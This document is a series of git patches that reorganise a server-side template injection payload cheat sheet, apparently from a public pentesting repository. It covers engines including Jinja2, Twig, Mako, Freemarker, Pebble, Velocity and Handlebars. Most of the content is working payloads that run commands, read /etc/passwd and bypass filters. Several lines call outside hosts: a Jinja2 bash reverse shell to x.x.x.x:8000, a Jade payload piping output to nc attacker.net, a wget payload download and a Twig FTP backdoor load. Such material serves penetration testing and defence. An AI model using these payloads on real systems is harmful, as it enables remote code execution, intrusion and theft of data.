From 5d846e9b8dd3b862faf5afaf3a033d35f315661f Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:28:29 +0200 Subject: [PATCH 1/6] Update README.md --- Server Side Template Injection/README.md | 54 ++++++++++++------------ 1 file changed, 28 insertions(+), 26 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 858eab6..9e0bcef 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -6,32 +6,21 @@ * [Tools](#tools) * [Methodology](#methodology) -* [Ruby](#ruby) - * [Basic injections](#ruby---basic-injections) - * [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - * [List files and directories](#ruby---list-files-and-directories) +* [ASP.NET Razor](#aspnet-razor) + * [Basic injection](#aspnet-razor---basic-injection) + * [Command execution](#aspnet-razor---command-execution) +* [Expression Language EL](#expression-language-el) + * [Basic injection](#expression-language-el---basic-injection) + * [Code execution](#expression-language-el---code-execution) +* [Freemarker](#freemarker) + * [Basic injection](#freemarker---basic-injection) + * [Code execution](#freemarker---code-execution) +* [Handlebars](#handlebars) +* [Jade / Codepen](#jade--codepen) * [Java](#java) * [Basic injection](#java---basic-injection) * [Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables) * [Retrieve /etc/passwd](#java---retrieve-etcpasswd) -* [Expression Language EL](#expression-language-el) - * [Basic injection](#expression-language-el---basic-injection) - * [Code execution](#expression-language-el---code-execution) -* [Twig](#twig) - * [Basic injection](#twig---basic-injection) - * [Template format](#twig---template-format) - * [Arbitrary File Reading](#twig---arbitrary-file-reading) - * [Code execution](#twig---code-execution) -* [Smarty](#smarty) -* [Freemarker](#freemarker) - * [Basic injection](#freemarker---basic-injection) - * [Code execution](#freemarker---code-execution) -* [Pebble](#pebble) - * [Basic injection](#pebble---basic-injection) - * [Code execution](#pebble---code-execution) -* [Jade / Codepen](#jade--codepen) -* [Velocity](#velocity) -* [Mako](#mako) * [Jinja2](#jinja2) * [Basic injection](#jinja2---basic-injection) * [Template format](#jinja2---template-format) 
@@ -45,11 +34,22 @@ * [Jinjava](#jinjava) * [Basic injection](#jinjava---basic-injection) * [Command execution](#jinjava---command-execution) -* [Handlebars](#handlebars) -* [ASP.NET Razor](#aspnet-razor) - * [Basic injection](#aspnet-razor---basic-injection) - * [Command execution](#aspnet-razor---command-execution) * [Lessjs](#lessjs) +* [Mako](#mako) +* [Pebble](#pebble) + * [Basic injection](#pebble---basic-injection) + * [Code execution](#pebble---code-execution) +* [Ruby](#ruby) + * [Basic injections](#ruby---basic-injections) + * [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) + * [List files and directories](#ruby---list-files-and-directories) +* [Smarty](#smarty) +* [Twig](#twig) + * [Basic injection](#twig---basic-injection) + * [Template format](#twig---template-format) + * [Arbitrary File Reading](#twig---arbitrary-file-reading) + * [Code execution](#twig---code-execution) +* [Velocity](#velocity) * [References](#references) ## Tools @@ -67,6 +67,8 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true) +--- + ## Ruby ### Ruby - Basic injections From f44fae68b50c41519e72fc09691258c74428feb7 Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:30:35 +0200 Subject: [PATCH 2/6] Update README.md --- Server Side Template Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 9e0bcef..c8ffa04 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -653,6 +653,8 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ### ASP.NET Razor - Basic injection +https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c + ```powershell @(1+2) ``` @@ -665,6 +667,8 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 } ``` +--- + ## Lessjs ### Lessjs - SSRF / LFI @@ -717,6 +721,8 @@ registerPlugin({ }) ``` +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 030e53658612f04c366a2f92d3a45a739f434d9f Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:37:05 +0200 Subject: [PATCH 3/6] Update README.md --- Server Side Template Injection/README.md | 403 ++++++++++++----------- 1 file changed, 210 insertions(+), 193 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index c8ffa04..e238b0e 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -69,85 +69,32 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment --- -## Ruby +## ASP.NET Razor -### Ruby - Basic injections +### ASP.NET Razor - Basic injection -ERB: - -```ruby -<%= 7 * 7 %> -``` - -Slim: - -```ruby -#{ 7 * 7 } -``` - -### Ruby - Retrieve /etc/passwd - -```ruby -<%= File.open('/etc/passwd').read %> -``` - -### Ruby - List files and directories - -```ruby -<%= Dir.entries('/') %> -``` - -### Ruby - Code execution - -Execute code using SSTI for ERB engine. - -```ruby -<%= system('cat /etc/passwd') %> -<%= `ls /` %> -<%= IO.popen('ls /').readlines() %> -<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> -<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> -``` - - -Execute code using SSTI for Slim engine. +https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c ```powershell -#{ %x|env| } +@(1+2) ``` -## Java +### ASP.NET Razor - Command execution -### Java - Basic injection - -```java -${7*7} -${{7*7}} -${class.getClassLoader()} -${class.getResource("").getPath()} -${class.getResource("../../../../../index.htm").getContent()} +```csharp +@{ + // C# code +} ``` -### Java - Retrieve the system’s environment variables - -```java -${T(java.lang.System).getenv()} -``` - -### Java - Retrieve /etc/passwd - -```java -${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} - 
-${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} -``` +--- ## Expression Language EL ### Expression Language EL - Basic injection ```java -${1+1} +${1+1} #{1+1} ``` @@ -163,7 +110,6 @@ ${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".g ### Expression Language EL - Code Execution - ```java // Common RCE payloads ''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec() 
@@ -192,65 +138,7 @@ ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().g ${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} ``` - -## Twig - -### Twig - Basic injection - -```python -{{7*7}} -{{7*'7'}} would result in 49 -{{dump(app)}} -{{app.request.server.all|join(',')}} -``` - -### Twig - Template format - -```python -$output = $twig > render ( - 'Dear' . $_GET['custom_greeting'], - array("first_name" => $user.first_name) -); - -$output = $twig > render ( - "Dear {first_name}", - array("first_name" => $user.first_name) -); -``` - -### Twig - Arbitrary File Reading - -```python -"{{'/etc/passwd'|file_excerpt(1,30)}}"@ -``` - -### Twig - Code execution - -```python -{{self}} -{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} -{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} -{{['id']|filter('system')}} -{{['cat\x20/etc/passwd']|filter('system')}} -{{['cat$IFS/etc/passwd']|filter('system')}} -``` - -Example with an email passing FILTER_VALIDATE_EMAIL PHP. - -```powershell -POST /subscribe?0=cat+/etc/passwd HTTP/1.1 -email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld -``` - -## Smarty - -```python -{$smarty.version} -{php}echo `id`;{/php} //deprecated in smarty v3 -{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} -{system('ls')} // compatible v3 -{system('cat index.php')} // compatible v3 -``` +--- ## Freemarker 
@@ -280,35 +168,65 @@ ${"freemarker.template.utility.Execute"?new()("id")} ${dwf.newInstance(ec,null)("id")} ``` -## Pebble +--- -### Pebble - Basic injection +## Handlebars -```java -{{ someString.toUPPERCASE() }} +### Handlebars - Command Execution + +```handlebars +{{#with "s" as |string|}} + {{#with "e"}} + {{#with split as |conslist|}} + {{this.pop}} + {{this.push (lookup string.sub "constructor")}} + {{this.pop}} + {{#with string.split as |codelist|}} + {{this.pop}} + {{this.push "return require('child_process').execSync('ls -la');"}} + {{this.pop}} + {{#each conslist}} + {{#with (string.sub.apply 0 codelist)}} + {{this}} + {{/with}} + {{/each}} + {{/with}} + {{/with}} + {{/with}} +{{/with}} ``` -### Pebble - Code execution +--- -Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`. +## Java -New version of Pebble : +### Java - Basic injection ```java -{% set cmd = 'id' %} -{% set bytes = (1).TYPE - .forName('java.lang.Runtime') - .methods[6] - .invoke(null,null) - .exec(cmd) - .inputStream - .readAllBytes() %} -{{ (1).TYPE - .forName('java.lang.String') - .constructors[0] - .newInstance(([bytes]).toArray()) }} +${7*7} +${{7*7}} +${class.getClassLoader()} +${class.getResource("").getPath()} +${class.getResource("../../../../../index.htm").getContent()} ``` +### Java - Retrieve the system’s environment variables + +```java +${T(java.lang.System).getenv()} +``` + +### Java - Retrieve /etc/passwd + +```java +${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} + 
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} +``` + +--- + + ## Jade / Codepen ```python @@ -350,7 +268,7 @@ ${x} ### Direct access to os from TemplateNamespace: -Any of these payloads allows direct access to the `os` module +Any of these payloads allows direct access to the `os` module ```python ${self.module.cache.util.os.system("id")} @@ -549,13 +467,13 @@ In another GET parameter include a variable named "input" that contains the comm ```python # evil config -{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # load the evil config {{ config.from_pyfile('/tmp/evilconfig.cfg') }} # connect to evil host -{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} +{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` 
@@ -608,7 +526,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) -### Jinjava - Command execution +### Jinjava - Command execution Fixed by https://github.com/HubSpot/jinjava/pull/230 @@ -619,54 +537,9 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} - {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` -## Handlebars - -### Handlebars - Command Execution - -```handlebars -{{#with "s" as |string|}} - {{#with "e"}} - {{#with split as |conslist|}} - {{this.pop}} - {{this.push (lookup string.sub "constructor")}} - {{this.pop}} - {{#with string.split as |codelist|}} - {{this.pop}} - {{this.push "return require('child_process').execSync('ls -la');"}} - {{this.pop}} - {{#each conslist}} - {{#with (string.sub.apply 0 codelist)}} - {{this}} - {{/with}} - {{/each}} - {{/with}} - {{/with}} - {{/with}} -{{/with}} -``` - -## ASP.NET Razor - -### ASP.NET Razor - Basic injection - -https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c - -```powershell -@(1+2) -``` - -### ASP.NET Razor - Command execution - -```csharp -@{ - // C# code -} -``` - --- ## Lessjs @@ -706,7 +579,7 @@ version 2 example RCE plugin: ```javascript functions.add('cmd', function(val) { return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`; -}); +}); ``` version 3 and above example RCE plugin 
@@ -723,6 +596,150 @@ registerPlugin({ --- +## Pebble + +### Pebble - Basic injection + +```java +{{ someString.toUPPERCASE() }} +``` + +### Pebble - Code execution + +Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`. + +New version of Pebble : + +```java +{% set cmd = 'id' %} +{% set bytes = (1).TYPE + .forName('java.lang.Runtime') + .methods[6] + .invoke(null,null) + .exec(cmd) + .inputStream + .readAllBytes() %} +{{ (1).TYPE + .forName('java.lang.String') + .constructors[0] + .newInstance(([bytes]).toArray()) }} +``` + +--- + +## Ruby + +### Ruby - Basic injections + +ERB: + +```ruby +<%= 7 * 7 %> +``` + +Slim: + +```ruby +#{ 7 * 7 } +``` + +### Ruby - Retrieve /etc/passwd + +```ruby +<%= File.open('/etc/passwd').read %> +``` + +### Ruby - List files and directories + +```ruby +<%= Dir.entries('/') %> +``` + +### Ruby - Code execution + +Execute code using SSTI for ERB engine. + +```ruby +<%= system('cat /etc/passwd') %> +<%= `ls /` %> +<%= IO.popen('ls /').readlines() %> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> +``` + + +Execute code using SSTI for Slim engine. + +```powershell +#{ %x|env| } +``` + + +--- + +## Smarty + +```python +{$smarty.version} +{php}echo `id`;{/php} //deprecated in smarty v3 +{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} +{system('ls')} // compatible v3 +{system('cat index.php')} // compatible v3 +``` + +--- + +## Twig + +### Twig - Basic injection + +```python +{{7*7}} +{{7*'7'}} would result in 49 +{{dump(app)}} +{{app.request.server.all|join(',')}} +``` + +### Twig - Template format + +```python +$output = $twig > render ( + 'Dear' . 
$_GET['custom_greeting'], + array("first_name" => $user.first_name) +); + +$output = $twig > render ( + "Dear {first_name}", + array("first_name" => $user.first_name) +); +``` + +### Twig - Arbitrary File Reading + +```python +"{{'/etc/passwd'|file_excerpt(1,30)}}"@ +``` + +### Twig - Code execution + +```python +{{self}} +{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} +{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +``` + +Example with an email passing FILTER_VALIDATE_EMAIL PHP. + +```powershell +POST /subscribe?0=cat+/etc/passwd HTTP/1.1 +email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld +``` + +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 58d88e5293de6e2fd706621cfd959e963cc720ed Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:48:51 +0200 Subject: [PATCH 4/6] Update README.md --- Server Side Template Injection/README.md | 249 +++++++++++++---------- 1 file changed, 136 insertions(+), 113 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index e238b0e..fe8a636 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -198,6 +198,21 @@ ${dwf.newInstance(ec,null)("id")} --- +## Jade / Codepen + +```python +- var x = root.process +- x = x.mainModule.require +- x = x('child_process') += x.exec('id | nc attacker.net 80') +``` + +```javascript +#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} +``` + +--- + ## Java ### Java - Basic injection 
@@ -226,116 +241,6 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex --- - -## Jade / Codepen - -```python -- var x = root.process -- x = x.mainModule.require -- x = x('child_process') -= x.exec('id | nc attacker.net 80') -``` - -```javascript -#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} -``` - -## Velocity - -```python -#set($str=$class.inspect("java.lang.String").type) -#set($chr=$class.inspect("java.lang.Character").type) -#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) -$ex.waitFor() -#set($out=$ex.getInputStream()) -#foreach($i in [1..$out.available()]) -$str.valueOf($chr.toChars($out.read())) -#end -``` - -## Mako - -[Official website](https://www.makotemplates.org/) -> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. 
- -```python -<% -import os -x=os.popen('id').read() -%> -${x} -``` - -### Direct access to os from TemplateNamespace: - -Any of these payloads allows direct access to the `os` module - -```python -${self.module.cache.util.os.system("id")} -${self.module.runtime.util.os.system("id")} -${self.template.module.cache.util.os.system("id")} -${self.module.cache.compat.inspect.os.system("id")} -${self.__init__.__globals__['util'].os.system('id')} -${self.template.module.runtime.util.os.system("id")} -${self.module.filters.compat.inspect.os.system("id")} -${self.module.runtime.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.util.os.system("id")} -${self.template.__init__.__globals__['os'].system('id')} -${self.module.cache.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.util.os.system("id")} -${self.template.module.cache.compat.inspect.os.system("id")} -${self.module.cache.compat.inspect.linecache.os.system("id")} -${self.template._mmarker.module.runtime.util.os.system("id")} -${self.attr._NSAttr__parent.module.cache.util.os.system("id")} -${self.template.module.filters.compat.inspect.os.system("id")} -${self.template.module.runtime.compat.inspect.os.system("id")} -${self.module.filters.compat.inspect.linecache.os.system("id")} -${self.module.runtime.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.exceptions.util.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} -${self.context._with_template.module.cache.util.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.template.module.cache.util.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.util.os.system("id")} -${self.module.cache.util.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.util.compat.inspect.os.system("id")} 
-${self.module.runtime.util.compat.inspect.linecache.os.system("id")} -${self.module.runtime.exceptions.traceback.linecache.os.system("id")} -${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.compat.inspect.os.system("id")} -${self.template.module.cache.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} -${self.template._mmarker.module.filters.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} -${self.template.module.filters.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} -${self.context._with_template._mmarker.module.cache.util.os.system("id")} -${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.cache.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} -${self.context._with_template._mmarker.module.runtime.util.os.system("id")} -${self.context._with_template.module.filters.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.exceptions.util.os.system("id")} -${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} -``` - -PoC : - -```python ->>> print(Template("${self.module.cache.util.os}").render()) - -``` - -Source 
[@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - ## Jinja2 [Official website](https://jinja.palletsprojects.com/) @@ -476,7 +381,6 @@ In another GET parameter include a variable named "input" that contains the comm {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` - ### Jinja2 - Filter bypass ```python @@ -515,8 +419,13 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} ``` +--- + ## Jinjava +[Official website](https://github.com/HubSpot/jinjava) +> Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content). + ### Jinjava - Basic injection ```python @@ -544,6 +453,9 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ## Lessjs +[Official website](https://lesscss.org/) +> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles. + ### Lessjs - SSRF / LFI ```less 
@@ -594,10 +506,99 @@ registerPlugin({ }) ``` +--- + +## Mako + +[Official website](https://www.makotemplates.org/) +> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. + +```python +<% +import os +x=os.popen('id').read() +%> +${x} +``` + +### Direct access to os from TemplateNamespace: + +Any of these payloads allows direct access to the `os` module + +```python +${self.module.cache.util.os.system("id")} +${self.module.runtime.util.os.system("id")} +${self.template.module.cache.util.os.system("id")} +${self.module.cache.compat.inspect.os.system("id")} +${self.__init__.__globals__['util'].os.system('id')} +${self.template.module.runtime.util.os.system("id")} +${self.module.filters.compat.inspect.os.system("id")} +${self.module.runtime.compat.inspect.os.system("id")} +${self.module.runtime.exceptions.util.os.system("id")} +${self.template.__init__.__globals__['os'].system('id')} +${self.module.cache.util.compat.inspect.os.system("id")} +${self.module.runtime.util.compat.inspect.os.system("id")} +${self.template._mmarker.module.cache.util.os.system("id")} +${self.template.module.cache.compat.inspect.os.system("id")} +${self.module.cache.compat.inspect.linecache.os.system("id")} +${self.template._mmarker.module.runtime.util.os.system("id")} +${self.attr._NSAttr__parent.module.cache.util.os.system("id")} +${self.template.module.filters.compat.inspect.os.system("id")} +${self.template.module.runtime.compat.inspect.os.system("id")} +${self.module.filters.compat.inspect.linecache.os.system("id")} +${self.module.runtime.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.exceptions.util.os.system("id")} 
+${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} +${self.context._with_template.module.cache.util.os.system("id")} +${self.module.runtime.exceptions.compat.inspect.os.system("id")} +${self.template.module.cache.util.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.util.os.system("id")} +${self.module.cache.util.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.util.compat.inspect.os.system("id")} +${self.module.runtime.util.compat.inspect.linecache.os.system("id")} +${self.module.runtime.exceptions.traceback.linecache.os.system("id")} +${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} +${self.template._mmarker.module.cache.compat.inspect.os.system("id")} +${self.template.module.cache.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} +${self.template._mmarker.module.filters.compat.inspect.os.system("id")} +${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} +${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} +${self.template.module.filters.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} +${self.context._with_template._mmarker.module.cache.util.os.system("id")} +${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} +${self.context._with_template.module.cache.compat.inspect.os.system("id")} +${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} 
+${self.context._with_template._mmarker.module.runtime.util.os.system("id")} +${self.context._with_template.module.filters.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.exceptions.util.os.system("id")} +${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} +``` + +PoC : + +```python +>>> print(Template("${self.module.cache.util.os}").render()) + +``` + +Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) + + --- ## Pebble +[Official website](https://pebbletemplates.io/) +> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. + ### Pebble - Basic injection ```java @@ -667,18 +668,19 @@ Execute code using SSTI for ERB engine. <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ``` - Execute code using SSTI for Slim engine. ```powershell #{ %x|env| } ``` - --- ## Smarty +[Official website](https://www.smarty.net/docs/en/) +> Smarty is a template engine for PHP. + ```python {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 @@ -691,6 +693,9 @@ Execute code using SSTI for Slim engine. ## Twig +[Official website](https://twig.symfony.com/) +> Twig is a modern template engine for PHP. + ### Twig - Basic injection ```python 
@@ -740,6 +745,24 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld --- +## Velocity + +[Official website](https://velocity.apache.org/engine/1.7/user-guide.html) +> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code. + +```python +#set($str=$class.inspect("java.lang.String").type) +#set($chr=$class.inspect("java.lang.Character").type) +#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) +$ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()]) +$str.valueOf($chr.toChars($out.read())) +#end +``` + +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 6d48f28d99e9af1b58b032bab4ec485afe8de22b Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:55:23 +0200 Subject: [PATCH 5/6] Update README.md --- Server Side Template Injection/README.md | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index fe8a636..add2466 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -71,9 +71,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ## ASP.NET Razor -### ASP.NET Razor - Basic injection +[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c) +> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. 